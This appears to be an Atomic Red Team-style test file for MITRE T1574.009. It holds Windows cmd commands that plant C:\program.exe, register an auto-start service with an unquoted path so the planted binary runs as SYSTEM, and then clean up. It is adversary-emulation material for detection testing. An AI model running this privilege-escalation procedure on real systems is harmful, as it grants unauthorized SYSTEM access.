#TechniqueName: Hijack Execution Flow: Path Interception by Unquoted Path
#AtomicTestName: Execution of program.exe as service with unquoted service path
#Description: When a service is created whose executable path contains spaces and isn’t enclosed within quotes, leads to a vulnerability&known as Unquoted Service Path which allows a user to gain SYSTEM privileges.&In this case, if an executable program.exe in C:\ exists, C:\program.exe will be executed instead of test.exe in C:\Program Files\subfolder\test.exe.&
#Language: cmd

#commands
copy PathToAtomicsFolder\T1574.009\bin\WindowsServiceExample.exe "C:\Program Files\windows_service.exe"
copy PathToAtomicsFolder\T1574.009\bin\WindowsServiceExample.exe "C:\program.exe"
sc create "Example Service" binpath= "C:\Program Files\windows_service.exe" Displayname= "Example Service" start= auto
sc start "Example Service"


#cleanup_commands
sc stop "Example Service" >nul 2>&1
sc delete "Example Service" >nul 2>&1
del "C:\Program Files\windows_service.exe" >nul 2>&1
del "C:\program.exe" >nul 2>&1
del "C:\Time.log" >nul 2>&1

